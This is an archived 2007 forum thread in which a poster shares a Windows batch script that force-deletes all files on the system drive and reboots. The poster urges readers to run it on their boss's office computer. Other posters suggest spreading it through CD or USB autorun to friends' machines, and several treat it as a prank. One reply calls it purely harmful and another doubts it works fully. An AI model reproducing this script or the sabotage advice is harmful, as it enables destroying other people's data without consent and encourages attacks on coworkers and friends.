View Full Version : Deleting C: Drive
Batistabomb
09-08-2007, 04:35 PM
Type this in notepad :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save this as .bat and run(not in your system)
Buzz C: DRIVE is deleted completely
Perform this trick on your Boss System in office
Guys forgive me if this post is violent or hurts against our forum rules
slugger
09-08-2007, 08:25 PM
shudn't it b in d tutorials section ;)
12vinod
13-08-2007, 04:06 PM
Is this any virus i saw this type of topic in other forums,good but risky tip
slugger
13-08-2007, 04:15 PM
Is this any virus i saw this type of topic in other forums,good but risky tip
if a virus wants 2 delete a drive, it wud use sumthin similar in its instruction set
wat so gud abt it?
no benefits only harm can b caused by it:neutral:
praka123
17-08-2007, 01:33 PM
sure some lucky brainiac is gonna try this script this week ;) any body there to format and reinstall windows?do try above :D
fun2sh
18-08-2007, 07:51 AM
does this really works. then abt all the security and all
Pathik
18-08-2007, 08:52 AM
better still save the above code as a batch file and burn it to a cd wit an autorun.. Done it many times
a_k_s_h_a_y
18-08-2007, 09:52 PM
so does this really work ?? am going to put this my friend's flash drive and set it to auto run !!
Pathik
18-08-2007, 10:17 PM
yup yup it ll... i hav been doing these things since long... they r very helpful to noobs..
clmlbx
18-08-2007, 10:32 PM
thanx for sharing, if it is usefull......................it is usefull as said by pathiks
soo thanx
Rollercoaster
18-08-2007, 10:42 PM
it wont work so simply...
a partition cannot be unmounted while the OS is running...hence not formatted
besides this kind of material should be posted with a warning.. if at all posted.
Batistabomb
21-08-2007, 10:10 AM
Roller coaster why cant you try in any of your Boss or Md system
vBulletin® v3.7.0, Copyright ©2000-2008, Jelsoft Enterprises Ltd.